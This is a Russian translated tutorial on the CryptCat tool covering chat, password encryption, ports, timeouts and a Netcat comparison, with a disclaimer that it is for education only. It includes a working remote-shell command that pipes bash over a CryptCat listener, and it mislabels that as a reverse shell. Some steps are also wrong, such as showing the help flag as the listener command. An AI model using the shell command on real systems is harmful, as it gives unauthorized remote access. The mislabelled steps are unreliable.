Руководство по CryptCat

Дата: 11.09.2020. Автор: Игорь Б. Категории: Статьи по информационной безопасности

В этой статье пойдет речь об основных функциях и возможностях CryptCat. Читатели также узнают, как получить сеанс пользователя с помощью этого инструмента.

Введение

CryptCat – это обычный, но немного усовершенствованный инструмент NetCat с двусторонним шифрованием. Он считается самой простой утилитой Unix, что способна считывать и записывать данные посредством сетевых соединений. Программа может использовать протокол TCP или UDP при шифровании данных, передаваемых по сети. Также стоит отметить, что это надежный локальный инструмент, который легко управляется другими программами и скриптами. Он еще считается инструментом отладки и исследования сети.

CryptCat выступает в качестве клиента TCP / UDP или сервера при подключении к сокету или в качестве листенера того же сокета. Он может получить пароль и зашифровать или расшифровать данные, которые передаются между двумя компьютерами. Без предоставления пароля инструмент будет вводить пароль по умолчанию, а то есть – «metallica».

В данной статье читатели изучат работу и применение программы на практике, познакомившись со всеми доступными вариантами ее использования.

cryptcat -h

Общение

CryptCat можно использовать для общения между двумя пользователями.  Для этого нужно установить стабильное соединение перед началом. Понадобятся две системы: одна будет листенером, а другая – инициатором. Таким образом, общение может осуществляться с обеих сторон.

Здесь пользователь попытался создать скрипт для общения двух пользователей с разными операционными системами.

Пользователь 1.

ОС: Kali Linux.

IP-адрес: 192.168.0.107.

Роль: листенер.

Чтобы инициировать листенер на Kali Linux, необходимо выполнить следующую команду для его создания:

cryptcat -h

Пользователь 2.

ОС: Ubuntu.

IP-адрес: 192.168.0.108.

Роль: инициатор.

Чтобы создать инициатор, пользователь просто предоставит IP-адрес системы, в которой он запустил листенер, а затем – сам номер порта.

cryptcat 192.168.0.107 42

Verbose mode

В CryptCat Verbose mode может быть инициирован с помощью параметра [- v]. Он был активирован для получения подробной информации о действиях человека. Пользователь попробует описать упомянутую выше систему чата с этим режимом. Здесь он увидит, что когда пользователь добавляет [- v] к команде CryptCat, программа отображает информацию о процессе, который выполняется при подключении.

Со стороны листенера:

cryptcat -lvp 42

Со стороны инициатора:

cryptcat -v 192.168.0.107 42

Защита паролем

В CryptCat пользователь может защитить его соединение чата паролем, и этот пароль может быть добавлен с помощью параметра [- k]. Пользователь уже знает, что CryptCat предоставляет ему возможность для сквозного шифрования, но с помощью параметра [- k] он способен обеспечить дополнительный уровень защиты своего соединения. Это будет сделано настолько надежно, что расшифровать данную связь практически невозможно. Пользователь может попытаться установить эту защиту с помощью следующих команд.

Со стороны листенера стоит применить параметр [- k] вместе с паролем.

cryptcat -k ignite -lvp 42

Со стороны инициатора нужно использовать тот же пароль, что и у листенера, чтобы оба могли подключиться к определенному соединению.

cryptcat -v -k ignite 192.168.0.107 42

Реверсивный Shell

Реверсивный или обратный Shell – это такой Shell, в котором целевая машина взаимодействует с атакующей. Атакующая машина получает соединение через порт, предоставляя пароль. Чтобы активировать листенер на целевой машине для получения Shell, следует использовать следующую команду:

cryptcat -k mysecret -l -p 3333 0<myfifo | /bin/bash 1>myfifo

Теперь просто нужно подключиться к жертве со стороны нападающего. Затем пользователь может аутентифицировать себя, как только он получит доступ root. Используется команда whoami.

cryptcat -k mysecret 192.168.0.107 3333
whoami
ip a

Случайный порт

Если пользователь не может выбрать номер порта, чтобы запустить листенер или установить соединение CryptCat, есть специальный параметр [- r] для него, который поможет определить и найти случайный локальный порт.

cryptcat -lv -r

Тайм-аут и интервал задержки

Большинство из специалистов могут перепутать эти терминами. Тайм-аут — это время для выполнения своей задачи или программы. Тогда как интервал задержки — это интервал времени между двумя отдельными запросами или задачами. Таким образом, в CryptCat есть параметр [-w] для тайм-аута и параметр [-i] для интервала задержки. Можно применить эти два различных параметра, чтобы получить желаемые результаты.

Со стороны листенера применяются как тайм-аут, так и интервал задержки:

cryptcat -v -w 30 -i 10 -l -p 8080

Со стороны инициатора применяется только тайм-аут.

cryptcat -v -w 2 192.168.0.7 8080

Netcat и CryptCat

Ну, прежде чем сравнивать эти две программы, пользователь должен чуть больше узнать о Netcat или nc. Это утилита, использующая TCP и UDP-соединения для чтения и записи в сети. Она может быть применена как для обеспечения безопасности, так и для взлома.

В случае взлома инструмент может быть использован с помощью скриптов, что делает его довольно надежным. И если говорить о безопасности, это помогает пользователю отлаживать сеть наряду с инвестированием в нее.

А когда дело доходит до CryptCat, то она считается более продвинутой версией Netcat. Инструмент предоставляет клиентам двустороннее шифрование, которое делает их соединение более безопасным. Далее будут сравнены эти два удивительные инструмента, основанные на шифровании соединения функций чата, с перехватыванием их сетевого интерфейса с помощью Wireshark.

Netcat:

Как уже известно, есть листенер и инициатор, чтобы установить соединение для общения в чате. Кроме того, пользователь инициировал Wireshark для перехвата сетевого интерфейса.

Со стороны слушателя человек использует параметр [- l] для прослушивания и параметр [- p] для получения номера порта:

nc -l -p 3131

Со стороны инициатора следует только указать номер порта вместе с IP-адресом листенера.

nc 192.168.0.111 3131

Теперь пользователь должен проверить, смог ли его Wireshark что-то захватить или нет. Как видно, программа успешно перехватила сеть и этот сетевой чат номер 4.

Cryptcat:

Сryptcat, как уже известно, предоставляет клиентам двустороннее шифрование, что делает сеть более безопасной, чем Netcat. Но нужно проверить и это, перехватив чат с помощью Wireshark. Для этого соединения нужен был листенер и инициатор.

Со стороны листенера следует использовать параметр [-p] для получения порта и [- l] для инициализации листенера.

cryptcat -l -p 3131

Со стороны инициатора нужно предоставить IP-адрес вместе с номером порта листенера.

cryptcat 192.168.0.111 3131

Теперь пользователь проверит, может ли он что-нибудь узнать новое или нет. Как видно на картинке, этот чат находится в зашифрованном режиме.

Это основное различие между Netcat и Cryptcat. Один обеспечивает шифрование в своей сети, а другой – этого не делает. Некоторые люди могут сказать, что CryptCat представляет собой шифрование + Netcat.

Автор переведенной статьи: Shubham Sharma.

Важно! Информация исключительно в учебных целях. Пожалуйста, соблюдайте законодательство и не применяйте данную информацию в незаконных целях.

Если вы нашли ошибку, пожалуйста, выделите фрагмент текста и нажмите Ctrl+Enter.

Поделиться ссылкой

Игорь Б

Об авторе Игорь Б

Автор на портале cisoclub.ru. Добавляйте ваш материал на сайт в разделе "Разместить публикацию".
Читать все записи автора Игорь Б

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

19 + два =